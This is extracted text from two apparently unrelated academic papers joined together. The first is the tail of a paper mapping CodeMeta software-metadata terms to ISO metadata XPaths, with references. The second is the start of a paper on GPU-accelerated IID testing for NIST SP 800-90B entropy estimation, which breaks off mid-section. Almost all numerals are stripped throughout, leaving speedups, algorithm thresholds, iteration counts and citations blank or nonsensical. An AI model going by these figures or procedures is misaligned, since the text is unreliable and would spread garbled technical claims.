application/package (e.g., mb). in the absence of a unit (mb, kb etc.), kb will be as- sumed. distributioninfo.transferoptions.transfersize or distribution- info.distributionformat.formatdistributor. distributortransferoptions.transfersize or distribution- info.distributor.distributortransferoptions .transfersize /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:transferoptions/mrd:md_digitaltransferoptions/mrd:transfersize/ gco:real or /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributionformat/mrd:md_format/mrd:formatdistributor/ mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:transfersize/gco:real or / mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:transfersize/gco:real installurl url url at which the app may be in- stalled, if different from the url of the item. distributioninfo.distributor.distributor transferoptions.online[function=’download’]. linkage or distribution- info.transferoptions.online [function=’download’].linkage or identificationinfo. citation.onlineresource[function =’download’].linkage /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:distributioninfo/mrd:md_distribution/mrd:transferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’]/cit:linkage/gco:characterstring (continued on next page) h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) property type description iso - iso - memory requirements text or url minimum memory requirements. identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri: md_dataidentification/mri:environmentdescription/gco:characterstring operating system text operating systems supported (windows , osx . , android . ). identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri: md_dataidentification/mri:environmentdescription/gco:characterstring permissions text permission(s) required to run the app (for example, a mobile app may require full internet access or may run only on wifi). identificationinfo.resourceconstraints or iden- tificationinfo.resourceconstraints.reference. onlineresource.linkage /mdb:md_metadata/mdb:identificationinfo/*/mri:resourceconstraints/ mco:md_legalconstraints or /mdb:md_metadata/mdb:identificationinfo/ mri:md_dataidentification/mri:resourceconstraints/ mco:md_legalconstraints/mco:reference/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource/cit:linkage processor requirements text processor architecture required to run the application (e.g., ia ). identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri: md_dataidentification/mri:environmentdescription/gco:characterstring release notes text or url description of what changed in this version. identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/mri:additionaldocumentation/ cit:ci_citation software help creativework software application help. identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/mri:additionaldocumentation/ cit:ci_citation software requirements softwaresourcecode required software dependencies identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/mri:additionaldocumentation/ cit:ci_citation software version text version of the software instance. identificationinfo.citation.edition /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:citation/cit:ci_citation/cit:edition storage requirements text or url storage requirements (free space required). identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:environmentdescription/gco:characterstring supporting data datafeed supporting data for a software ap- plication. identificationinfo.associatedresource.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource/mri:name/cit:ci_citation notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. associated attributes and hierarchical structure but ignoring those methods of providing meaning in xml and then stating that elements alone are ambiguous does not contribute to understanding differences between how these two approaches describe resources. i examine these differences in more detail and offer an explanation that is related to different approaches to defining types: xml can use attributes and structure to provide information about types and meaning while rdf must rely on unambiguous and shared definitions of terms. to use the case described in peroni, lapeyre & shotton, , the jats element ‘‘article’’ is definitely ambiguous. that is why the definition of the element includes an attribute called article-type to clarify the type of the article being described. details of the importance of attributes for semantics in xml is described in detail by seligy ( ) along with potential problems that result from ignoring attribute values. peroni, lapeyre & shotton ( ) also acknowledge the requirement for unambiguous definitions that are shared across communities. they state that ‘‘a cornerstone of the semantic web is the use of open published ontologies to give precise and universally available definitions to terms, so that rdf statements, whatever else they are, are unambiguous in their meaning.’’ while this may be a goal of ontology development efforts, many of the definitions currently used in codemeta and schema.org (shown in tables – ) are unclear, non-unique, and ambiguous. iso mappings are proposed for sixty-four of the sixty-eight codemeta v terms. these mappings can be used to create codemeta-compliant metadata from existing stores of iso metadata and to add codemeta compliant software citations in the future. this compares to an average of . mappings for other dialects included in the codemeta crosswalk. this disparity reflects the use cases targeted by the dialects. many of the dialects that have been mapped to codemeta are focused on citation or dependency identification and management while iso and codemeta share additional targets that include access, use, and understanding. acknowledgements thanks to matt jones, carl boettiger, dennis walworth, and melissa harrison for helpful comments and discussion of the initial draft of this paper. additional information and declarations funding all of this material is based upon work supported by the national science foundation under grant no. nsfdacs c and by nasa/gsfc under raytheon co. contract number nng hz c. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. national science foundation: nsfdacs c . nasa/gsfc: nng hz c. competing interests ted habermann is the director of earth science at the hdf group. the author declares that there are no competing interests. author contributions • ted habermann conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: habermann, ted ( ): mappingtables_iso - tocodemeta.csv. figshare. dataset. https://doi.org/ . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references codemeta crosswalk. . available at https://codemeta.github.io/crosswalk/ (accessed on august ). codemeta project. . available at https://codemeta.github.io (accessed on october ). crosswalk data. . codemeta/crosswalk.csv. available at https://github.com/ codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk. csv (accessed on august ). datacite metadata working group. . datacite metadata schema documentation for the publication and citation of research data. datacite e.v. version . . doi . / . gordon s, habermann t. . the influence of community recommendations on metadata completeness. ecological informatics : – doi . /j.ecoinf. . . . habermann t. a. metadata life cycles, use cases and hierarchies. geosciences ( ): doi . /geosciences . habermann t. b. mappingtables_iso - tocodemeta.csv. figshare. dataset doi . /m .figshare. .v . habermann t. c. codemeta mapping to iso . available at https://github. com/codemeta/codemeta/blob/master/crosswalks/iso_ - .csv (accessed on january ). habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://codemeta.github.io/crosswalk/ https://codemeta.github.io https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv http://dx.doi.org/ . / http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . /geosciences http://dx.doi.org/ . /m .figshare. .v https://github.com/codemeta/codemeta/blob/master/crosswalks/iso_ - .csv https://github.com/codemeta/codemeta/blob/master/crosswalks/iso_ - .csv http://dx.doi.org/ . /peerj-cs. international organization for standardization (iso) - , geographic information—metadata—part : fundamentals. . available at https://www. iso.org/standard/ .html. (accessed on october ). international organization for standardization (iso) - , geographic information—metadata—part : xml schema implementation for fundamental concepts. . available at https://www.iso.org/standard/ .html. (accessed on october ). iso conceptual model. . iso conceptual model—html view. available at https://www.isotc .org/hmmg/html/conceptualmodels/ (accessed on october ). peroni s, lapeyre da, shotton d. . from markup to linked data: mapping niso jats v . to rdf using the spar (semantic publishing and referencing) ontologies. in: journal article tag suite conference (jats-con) proceedings . bethesda: national center for biotechnology information. available at https://www.ncbi.nlm. nih.gov/books/nbk / (accessed on october ). resource description framework (rdf). . available at https://en.wikipedia.org/ wiki/resource_description_framework (accessed on december ). seligy m. . listen up! is it time for systems to start hearing what attributes are saying? in: journal article tag suite conference (jats-con) proceedings . bethesda: national center for biotechnology information. available at https://www. ncbi.nlm.nih.gov/books/nbk / (accessed on october ). smith am, katz ds, niemeyer ke. . force software citation working group, software citation principles. peerj computer science :e doi . /peerj-cs. . w c. . w c rdf . . xml syntax recommendation. available at https://www.w . org/tr/rdf-syntax-grammar/#section-syntax-intro (accessed on august ). habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://www.isotc .org/hmmg/html/conceptualmodels/ https://www.ncbi.nlm.nih.gov/books/nbk / https://www.ncbi.nlm.nih.gov/books/nbk / https://en.wikipedia.org/wiki/resource_description_framework https://en.wikipedia.org/wiki/resource_description_framework https://www.ncbi.nlm.nih.gov/books/nbk / https://www.ncbi.nlm.nih.gov/books/nbk / http://dx.doi.org/ . /peerj-cs. https://www.w .org/tr/rdf-syntax-grammar/#section-syntax-intro https://www.w .org/tr/rdf-syntax-grammar/#section-syntax-intro http://dx.doi.org/ . /peerj-cs. submitted june accepted january published march corresponding author yewon kim, fdt @kookmin.ac.kr academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright kim and yeom distributed under creative commons cc-by . open access accelerated implementation for testing iid assumption of nist sp - b using gpu yewon kim and yongjin yeom , department of financial information security, kookmin university, seoul, south korea department of information security, cryptology, and mathematics, kookmin university, seoul, south korea abstract in cryptosystems and cryptographic modules, insufficient entropy of the noise sources that serve as the input into random number generator (rng) may cause serious damage, such as compromising private keys. therefore, it is necessary to estimate the entropy of the noise source as precisely as possible. the national institute of standards and technology (nist) published a standard document known as special publication (sp) - b, which describes the method for estimating the entropy of the noise source that is the input into an rng. the nist offers two programs for running the entropy estimation process of sp - b, which are written in python and c++. the running time for estimating the entropy is more than one hour for each noise source. an rng tends to use several noise sources in each operating system supported, and the noise sources are affected by the environment. therefore, the nist program should be run several times to analyze the security of rng. the nist estimation runtimes are a burden for developers as well as evaluators working for the cryptographic module validation program. in this study, we propose a gpu-based parallel implementation of the most time-consuming part of the entropy estimation, namely the independent and identically distributed (iid) assumption testing process. to achieve maximal gpu performance, we propose a scalable method that adjusts the optimal size of the global memory allocations depending on gpu capability and balances the workload between streaming multiprocessors. our gpu-based implementation excluded one statistical test, which is not suitable for gpu implementation. we propose a hybrid cpu/gpu implementation that consists of our gpu-based program and the excluded statistical test that runs using openmp. the experimental results demonstrate that our method is about to times faster than that of the nist package. subjects cryptography, distributed and parallel computing, security and privacy keywords parallel processing, gpu computing, entropy estimator, nist sp - b, random number generator introduction a random number generator (rng) generates random numbers required to construct the cryptographic keys, nonce, salt, and sensitive security parameters used in cryptosystems and cryptographic modules. in general, an rng produces random numbers (output) via a deterministic algorithm, depending on the noise sources (input). if its input is affected by the low entropy of the noise sources, the output may be compromised. it is easy to how to cite this article kim y, yeom y. . accelerated implementation for testing iid assumption of nist sp - b using gpu. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:fdt @kookmin.ac.kr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. find examples that show the importance of entropy in operating systems. heninger et al. ( ) describes the rsa/dsa private keys for some tls/ssh hosts may be obtained due to insufficient entropy of linux pseudo-random number generator (prng) during the key generation process. ding et al. ( ) investigated the amount of the entropy of linux prng running on android in boot-time. kaplan et al. ( ) demonstrated an ipv denial of service attack and a stack canary bypass with the weaknesses of insufficient entropy in boot-time of android. kim, han & lee ( ) presented a technique to recover premastersecret (pms) of the first ssl session in android by complexity since pms is generated from insufficient entropy of openssl prng at boot-time. ristenpart & yilek ( ), bernstein et al. ( ), michaelis, meyer & schwenk ( ), schneier et al. ( ), and yoo, kang & yeom ( ) describe the attacks caused by weakness of entropy collectors or incorrect estimations of the entropy that are exaggerated or too conservative. insufficient entropy of the noise source that is the input into the rng may cause serious damage in cryptosystems and cryptographic modules. thus, it is necessary to estimate the entropy of the noise source as precisely as possible. the united states national institute of standards and technology (nist) special publication (sp) - b (barker & kelsey, ; sönmez turan et al., ; sönmez turan et al., ) is a standard document for estimating the entropy of the noise source. the general flow of the entropy estimation process in sp - b (sönmez turan et al., ) is to determine the track, estimate the entropy according to the track, and then apply the restart test, as summarized in fig. . in this paper, determining the track is referred to as an independent and identically distributed (iid) test. there are two different tracks: an iid track and a non-iid track. if it is determined as the iid track, it is assumed that the samples of the noise source are iid; otherwise, the samples are non-iid. the estimator depending on iid or non-iid track estimates the entropy of the noise source. the restart test evaluates the estimated entropy using different outputs from many restarts of the noise source to check the overestimate. this document is currently used in the cryptographic module validation program (cmvp) and has been cited as a recommendation for entropy estimation in an iso standard document iso/iec- ( ) for test and analysis methods of rngs. the principles of entropy estimators in sp - b have been investigated and analyzed theoretically (kang, park & yeom, ; zhu et al., ; zhu et al., ). however, it is difficult to find research on the efficient implementation of the entropy estimation process of sp - b. nist provides two programs (nist, ) on github for the entropy estimation process of sp - b. the first program is for the entropy estimation process of the second draft of sp - b (sönmez turan et al., ), written in python. the second program is for the entropy estimation process of the final version of sp - b (sönmez turan et al., ), written in c++. table displays the execution times of two single-threaded nist programs on the central processing unit (cpu). the noise source used as input is gettickcount, with a sample size of bits. gettickcount can be collected through the gettickcount() function in the windows environment. since gettickcount is determined as the non-iid by the iid test, the process of the iid-track estimation entropy does not run. the entropy estimation process of the iid track takes approximately one second for both nist programs kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow of the entropy estimation process of sp - b. full-size doi: . /peerjcs. /fig- table execution time of each single-threaded nist program for the entropy estimation process (noise source: gettickcount; noise sample size: bits). nist program written in python nist program written in c++ iid test h h min [iid track] estimation entropy − − [non-iid track] estimation entropy min s restart tests s min total execution time h min h min if it is forcibly operated. in table , the iid test consumes the majority of the total execution time in both programs. developers of cryptosystems or cryptographic modules should estimate the entropy of the noise sources to analyze the security of the rng. since the entropy estimation process of sp - b is representative, and modules for the cmvp shall be tested for compliance with sp - b (nist & cse, ), most developers use the method of sp - b. furthermore, since cmvp implementation guidance (ig) gives the link of the nist programs (nist & cse, ), most developers use the nist programs to reduce the time required for implementation. as recommended by the cmvp, the rng should use at least one noise source. since the nist program estimates the entropy for one noise source, kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the developer should run the nist program k times when the rng uses k noise sources. since the noise sources are different for each operating system, the developer should run the program k×s times if the developer’s cryptosystem or cryptographic module supports s operating systems. the distribution of the noise source may be changed due to mechanical or environmental changes or to the timing variations in human behavior (nist & cse, ). the physical noise source is based on a dedicated physical process (iso/iec- , ); it may be affected by the environment of the device in which the rng operates. therefore, to claim that the noise source has an identical distribution in any environment, the developer should perform the iid test and entropy estimation in several environments or devices. if the developer performs analysis on d devices, the developer should run the program k×s×d times. if k= , s= , and d = , the developer should run the nist program times. according to table , the nist program written in c++ requires approximately h to estimate the entropy of one noise source. if the developer cannot run multiple nist programs simultaneously, it takes about hours or approximately four days. moreover, to find k noise sources that can be used as inputs of the rng in the environment, the developer should perform entropy estimation for k or more collectible noise sources. therefore, it may take more than hours. the developer of the cryptographic module for the cmvp should perform similar work for re-examination or new examination every specific period since the module will be placed on the cmvp active list for five years. the evaluator running checks based on the documentation submitted by the developer for the cmvp may run the nist program multiple times as well. as this runtime may be burdensome for developers, it can be tempting to use an rng without security analysis. thus, if the developer’s rng is vulnerable, this vulnerability is likely to affect the overall security of the cryptosystem or cryptographic module. graphics processing units (gpus) are excellent candidates to accelerate the process of sp - b, especially the iid test. gpus were initially designed for accelerating computer graphics and image processing, but they have become more flexible, allowing them to be used for general computations in recent years. the use of gpus for performing computations handled by cpus is known as general-purpose computing on gpus (gpgpus). new parallel computing platforms and programming models, such as the computing unified device architecture (cuda) released by nvidia, enable software developers to leverage gpgpus for various applications. gpgpus are used in cryptography as well as areas including signal processing and artificial intelligence. numerous studies have been conducted on the parallel implementations of cryptographic algorithms such as aes, ecc, and rsa (neves & araujo, ; li et al., ; pan et al., ; ma et al., ; li et al., ) and on the acceleration of cryptanalysis, including hash collision attacks using gpus (stevens et al., ). to process the entire iid test in parallel using gpu, approximately gb or more of the global memory of the gpu are required. since the compression test used in the iid test requires a different technique of implementation from the other statistical tests, a cuda version of the compression test is needed to implement the iid test in parallel. however, bzip used in the compression test is not actively under development as a cuda version since it is unsuitable for gpu implementation. therefore, we propose a gpu-based parallel kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation of the iid test without the compression test using multiple optimization techniques. the adaptive size of the global memory used in the kernel function can be set so that maximal performance improvement can be obtained from the gpu specification in use. moreover, we propose a hybrid cpu/gpu implementation of the iid test that includes the compression test. our gpu-based implementation is approximately times faster than the multi-threaded nist program without the compression test when determining the noise source as the iid. it is approximately times faster when determining the noise source as the non-iid. our hybrid cpu/gpu implementation is and times, respectively, faster than the multi-threaded nist program with the compression test when determining the noise source as the iid and the non-iid, respectively. most noise sources are non-iid (kelsey, ). the non-iid noise sources are disk timings, interrupt timings, jitter (müller, ), gettickcount, and so on. since the proposed hybrid cpu/gpu implementation has better performance for the non-iid noise sources, we expect it to be highly practical. the remainder of this paper is organized as follows. ‘preliminaries’ introduces the cuda gpu programming model, the openmp programming model, and the iid test of sp - b. ‘proposed implementations’ outlines our gpu-based parallel implementation of the iid test and the hybrid cpu/gpu implementation of the iid test. in ‘experiments and performance evaluation’, the experimental results on the optimization and performance of our methods are presented and analyzed. finally, ‘conclusions’ summarizes and concludes the paper. preliminaries cuda programming model nvidia cuda (nvidia, b) is the most widely used programming model for gpus. cuda uses the single instruction multiple thread (simt) model. a kernel is a function that performs the same instruction on the gpu in parallel. a thread is the smallest unit operating the instructions of the kernel function. multiple threads are grouped into a cuda block, and multiple blocks are grouped into a grid. a cuda-capable gpu contains numerous cuda cores, which are fundamental computing units and execute the threads. cuda cores are collected into groups called streaming multiprocessors (sms). a kernel is launched from the host (cpu) to run on gpu and generate a collection of threads organized into blocks. each cuda block is assigned to one of the sms on the gpu and executes independently on gpu. the mapping between blocks and sms is done by a cuda scheduler (vaidya, ). an sm can concurrently execute the smaller group of threads, which is called a warp. all threads in a warp execute the same instruction, and there are threads in a warp on most cuda-capable gpus. latency can occur, such as data required for computation have not yet been fetched from global memory that the access is slow. to hide the latency, an sm can execute context-switching, which transfers control to another warp while waiting for the results. the memory of cuda-capable gpu includes global memory, local memory, shared memory, register, constant memory, and texture memory. table shows the memory kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table memory of cuda-capable gpu (nvidia, a). memory location on/off chip access scope lifetime register on r /w thread thread local off r /w thread thread shared on r /w all threads in block block global off r /w all threads +host host allocation constant off r all threads +host host allocation texture off r all threads +host host allocation types listed from top to bottom by access speed from fast to slow, and their principal characteristics. a basic frame of the program using the cuda programming model is as follows: allocate memory in the device (gpu) and transfer data from the host to the device (if necessary); launch the kernel; transfer data from the device to the host (if required). openmp programming model open multi-processing (openmp) (openmp, ) is an application programming interface (api) for parallel programming on the shared memory multiprocessors. it extends c, c++, and fortran on many platforms, instruction-set architectures, and operating systems, including linux and windows with a set of compiler directives, library routines, and environment variables. openmp facilitates the parallelization of the sequential program. the programmer adds parallelization directives to loops or statements in the program. openmp uses the fork-join parallelism (openmp, ). openmp program begins as a single thread of execution, called an initial thread. when the initial thread encounters a parallel construct, the thread spawns a team of itself and zero or more additional threads as needed and becomes the master of the new team. the statements and functions in the parallel region are executed in parallel by each thread in the team. all threads replicate the execution of the same code unless a work-sharing directive (such as for dividing the computation among threads) is specified within the parallel region. variables default to shared among all threads in parallel region. terms a sample is data obtained from one output of the (digitized) noise source and the sample size is the size of the (noise) sample in bits. for example, we collect a sample of the noise source gettickcount in windows by calling the gettickcount() function once. in this case, the sample size is bits. however, as certain estimators of sp - b do not support samples larger than bits, it is necessary to reduce the sample size. gettickcount is the elapsed time (in milliseconds) since the system was started. thus, it is thus easy to conclude that the low-order bits in the sample of gettickcount contain most of the variability. therefore, it would be reasonable to reduce the -bit sample to an -bit sample by using the lowest bits. the entropy estimation of sp - b is performed on input kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data consisting of one million samples, where each sample size is bits. furthermore, the maximum of the min-entropy per sample is . iid test for entropy estimation the iid test of sp - b consists of permutation testing and five additional chi-square tests. permutation testing identifies evidence against the null hypothesis that the noise source is iid. since the permutation testing is the most time-consuming step in the entire iid test, we only focus on the permutation testing in this study. algorithm permutation testing (sönmez turan et al., ). require: s=(s ,...,sl), where si is the noise sample and l= , , . ensure: decision on the iid assumption. : for statistical test i do : assign the counters ci, and ci, to zero. : calculate the test statistic testini on s. : end for : for j= to , do : permute s using the fisher–yates shuffle algorithm. : calculate the test statistic testshufflei on the shuffled data. : if (testshufflei > test in i ) then : increment ci, . : else if (testshufflei =test in i ) then : increment ci, . : end if : end for : if ((ci, +ci, ≤ )or(ci, ≥ , )) for any i then : reject the iid assumption. : else : assume that the noise source outputs are iid. : end if algorithm presents the algorithm of the permutation testing described in sp - b. the permutation testing first performs statistical tests on one million samples of the noise source, namely the original data. we refer to the results of the statistical tests as the original test statistics. thereafter, permutation testing carries out , iterations, as follows: in each iteration, the original data are shuffled, the statistical tests are performed on the shuffled data, and the results are compared with the original test statistics. after , iterations, the ranking of the original test statistics among the shuffled test statistics is computed. if the rank belongs to the top . % or bottom . %, the permutation testing determines that the original data (input) are not iid. that is, it concludes that the original data are not iid if eq. ( ) is satisfied for any i that is the index of the statistical test. for any i, the counter ci, is the number of j in step of alg:alg satisfying the shuffled test statistic testshufflei > the original test statistic test in i . the counter ci, is the number of kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm permutation testing of nist program written in c++. require: s=(s ,...,sl), where si is the noise sample and l= , , . ensure: decision on the iid assumption. : for statistical test i do : assign the counters ci, and ci, to zero. : calculate the test statistic testini on s. : end for : for j= to , do : permute s using the fisher–yates shuffle algorithm. : for statistical test i do : if statusi= true then : calculate the test statistic testshufflei on the shuffled data. : if (testshufflei > test in i ) then : increment ci, . : else if (testshufflei =test in i ) then : increment ci, . : else : increment ci, . : end if : if ((ci, +ci, > )and(ci, +ci, > )) then : statei= false. : end if : end if : end for : end for : if ((ci, +ci, ≤ )or(ci, ≥ , )) for any i then : reject the iid assumption. : else : assume that the noise source outputs are iid. : end if algorithm fisher–yates shuffle (sönmez turan et al., ). require: s=(s ,...,sl), where si is the noise sample and l= , , . ensure: shuffled s=(s ,...,sl). : for i from l downto do : generate a random integer j such that ≤ j≤ i. : swap sj and si. : end for kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. j satisfying testshufflei =test in i , whereas the counter ci, is the number of j satisfying testshufflei < test in i .( ci, +ci, ≤ ) or ( ci, ≥ , ) ( ) equivalently, the permutation testing determines that the original data are iid if eq. ( ) is satisfied for all i that is the index of the statistical test.( ci, +ci, > ) and ( ci, +ci, > ) ( ) the nist optimized the permutation testing of the nist program written in c++ using eq. ( ). thus, even if each statistical test is not performed , times completely, the permutation testing can determine that the input data are iid. algorithm is the improved version of the permutation testing optimized by the nist. we briefly introduce the shuffle algorithm and the tests used in the permutation testing. the shuffle algorithm is the fisher–yates shuffle algorithm presented in algorithm . the permutation testing uses statistical tests, the names of which are as follows: • excursion test • number of directional runs • length of directional runs • number of increases and decreases • number of runs based on the median • length of runs based on the median • average collision test statistic • maximum collision test statistic • periodicity test • covariance test • compression test* the aim of the periodicity test is to measure the number of periodic structures in the input data. the aim of the covariance test is to measure the strength of the lagged correlation. thus, the periodicity and covariance tests take a lag parameter as input and each test is repeated for five different values of the lag parameter: , , , , and (sönmez turan et al., ). therefore, a total of statistical tests are used in the permutation testing. if the input data are binary (that is, the sample size is bit), one of two conversions is applied to the input data for some of the statistical tests. the descriptions of each conversion and the names of the statistical tests using that conversion are as follows (sönmez turan et al., ): conversion i conversion i divides the input data into -bit non-overlapping blocks and counts the number of s in each block. if the size of the final block is less than bits, zeroes are appended. the numbers and lengths of directional runs, numbers of increases and decreases, periodicity test, and covariance test apply conversion i to the input data. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conversion ii conversion ii divides the input data into -bit non-overlapping blocks and calculates the integer value of each block. if the size of the final block is less than bits, zeroes are appended. the average collision test statistic and maximum collision test statistic apply conversion ii to the input data. for example, let the binary input data be ( , , , , , , , , , , , ). for conversion i, the first -bit block includes four s and the final block, which is not complete, includes three s. thus, the output data of conversion i are ( , ). for conversion ii, the integer value of first block is and the final block becomes ( , , , , , , , ) with an integer value of . thus, the output of conversion ii is ( , ). proposed implementations target of gpu-based parallel processing steps to of algorithm , with , iterations, consume most of the processing time of the permutation testing. the shuffle algorithm and statistical tests are performed on the data with one million samples of the noise source in each iteration. hence, it is natural to consider the gpu-based parallel implementation of , iterations, which are processed sequentially in the permutation testing. the implementation of the compression test* differs from those of the other statistical tests used in the permutation testing. the compression test* uses bzip (seward, ), which compresses the input data using the burrows–wheeler transform (bwt), the move-to-front (mtf) transform, and huffman coding. there have been studies on the parallel implementation of bzip using the gpu. in patel et al. ( ), all three main steps, namely the bwt, the mtf transform, and huffman coding, were implemented in parallel using the gpu. however, the performance was . times slower than that of the cpu implementation. in shastry et al. ( ), only the bwt was computed on the gpu and a performance improvement of . times that of the standard cpu-based algorithm was achieved. however, we couldn’t apply this approach, because our parallel test should be implemented on the gpu together with other statistical tests. moreover, the compression test does not play a key role in algorithm . that is, it is infrequent for a noise source to be determined as the non-iid only by the compression test results among the statistical tests used in the permutation testing. therefore, we design the gpu-based parallel implementation of the permutation testing consisting of the shuffle algorithm and statistical tests, without the compression algorithm. moreover, we design the hybrid cpu/gpu implementation of the permutation testing consisting of our gpu-based parallel implementation and a maximum of , compression tests using openmp. overview of gpu-based parallel permutation testing approximately . gb (= , × one million bytes of data) of the global memory of the gpu is required for the cpu to invoke a cuda kernel to process , iterations of the permutation testing in parallel on the gpu. some gpus do not have more than gb of global memory. therefore, we propose the gpu-based parallel implementation of the kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cpu/gpu workflow of gpu-based parallel implementation of permutation testing. (a) code running on the host/cpu. (b) code running on the device/gpu. full-size doi: . /peerjcs. /fig- permutation testing, which processes n iterations in parallel on the gpu according to the user’s gpu specification and repeats this process r=d , /ne times. figure presents the workflow of the cpu and gpu. the host refers to a general cpu that executes the program sequentially, whereas the device refers to a parallel processor such as a gpu. in steps to of fig. , the host performs statistical tests on one million bytes of the input data (without shuffling) and holds the results. in step , the host calls a function that allocates the device memory required to process n iterations in parallel on the device. the use and size of the variables are listed in table . in step , the input data (no. in table ), and the results of the statistical tests in steps to (no. in table ) are copied from the host to the device. in step , the host launches a cuda kernel curandinit, which initializes the n seeds used in the curand() function. the curand() function that generates random numbers using seeds on the device is invoked by the cuda kernel shuffling. when the host receives the completion of the kernel curandinit, the host proceeds to steps to . , iterations are divided into r rounds and each round processes n iterations in parallel on the device. to process n iterations, the host launches the cuda kernel shuffling (step ) and then launches the cuda kernel statistical test (step ) as soon as the host receives the completion of the kernel shuffling. when the host receives the completion of the kernel statistical test, in step , the counters kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table use and size of variables allocated to gpu. no. use of variable size of variable (bytes) original data (input) , , n shuffled data n × , , n seeds used by curand() function n× sizeof(curandstate)=n × original test statistics × sizeof(double)= counter ci, ,ci, ,ci, for ≤ i≤ × sizeof(int)× = n shuffled data after conversion ii (only used if the input is binary) n × , ci, , ci, , and ci, for i∈{ , ,..., }, which indicate the indices of the statistical tests, are copied from the device to the host. following the operations in steps to of algorithm , which correspond to those in steps and of fig. , the host moves on to step if eq. ( ) is satisfied for all i. finally, in step , the host determines whether or not the input data are iid. when the input data are binary, two conversions should be considered when designing the cuda kernels. therefore, we describe the cuda kernels designed to process n iterations in parallel on the gpu depending on whether the input data are binary. the descriptions of the cuda kernels shuffling and statistical test for non-binary noise sample are as follows: cuda kernel shuffling the kernel shuffling generates n shuffled data by permuting one million bytes of the original data n times in parallel. thus, each of n cuda threads permutes the original data using the fisher–yates shuffle algorithm and then stores the shuffled data in the global memory of the device. as the shuffle algorithm uses the curand() function, each thread uses its unique seed that is initialized by the kernel curandinit with its index, respectively. cuda kernel statistical test the kernel statistical test performs statistical tests on each of n shuffled data, and compares the shuffled and original test statistics. the size of each shuffled data is one million bytes and n shuffled data are stored in the global memory of the device. in this section, we present two methods that can easily be designed to handle this process in parallel on the gpu and propose an optimized method. parallelization 